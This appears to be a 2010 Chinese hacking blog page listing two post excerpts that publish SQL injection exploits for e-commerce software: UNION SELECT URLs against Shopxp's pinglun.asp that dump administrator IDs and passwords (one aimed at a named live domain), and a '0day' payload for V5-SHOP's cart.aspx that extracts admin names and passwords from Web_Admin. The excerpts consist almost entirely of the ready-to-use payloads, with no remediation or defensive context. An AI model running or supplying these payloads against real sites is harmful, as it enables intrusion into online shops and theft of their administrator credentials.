影子鹰安全网络-主站技术BLOG, 进阶式的学习平台...
 
用户登陆
用户:
密码:
   

站点日历
73 2010 - 7 48
    123
45678910
11121314151617
18192021222324
25262728293031

站点统计
日志:1320 篇
评论:3702 篇
引用:303812 个
会员:1170 人
留言:172 个
访问:18749335 次
今日:18670 平均:7000
建站:2001-10-10
在线人数: ?

最新评论

日志搜索

 标题   内容

友情链接

域名1元加1元送主机

其他信息
影子鹰安全网络-主站技术BLOG
::订阅到抓虾::
订阅到飞鸽
订阅到GOOGLE
订阅到yahoo
订阅到ROJO
RSS 1.0
RSS 2.0
[全部订阅更新]
[鄂ICP备05002492号]
联系我

::影子鹰业务联系专用QQ:;

Gmail:coolkawen(at)Gmail.com站长KAWEN联系方式
QQ群(::Blog交流::)

旗下域名

www.cn9x.com
www.cnyzy.cn


FEED订阅数一览


EMAIL订阅FEED
显示模式: 默认模式 | 树形模式
晴天 shopxp pinglun.asp 页面注入漏洞   [ 2010-07-21 09:24:18  |  影子鹰 ]

注入主语句exp
http://www.hackqing.cn/admin/pinglun.asp?id=131%20order%20by%2011and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from shopxp_admin 


http://127.0.0.1/admin%5Fshopxp/pinglun.asp?id=131%20and%201=2%20union%20select%201,2,adminid,4,5,password,7,8,9,admin,11%20from%20shopxp_admin

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:83
晴天 V5-SHOP商城SQL注射0day   [ 2010-07-21 09:23:52  |  影子鹰 ]

net 的在线商城系统 
以下是测试EXP:


cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 11=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 – 

阅读全文……
作者:kawen | 分类:资源共享 | 评论:0 | 引用:0 | 查看:94
  Powered by www.cnyzy.cn Rights © 2006 Processed in 0.220703 second(s) , 5 queries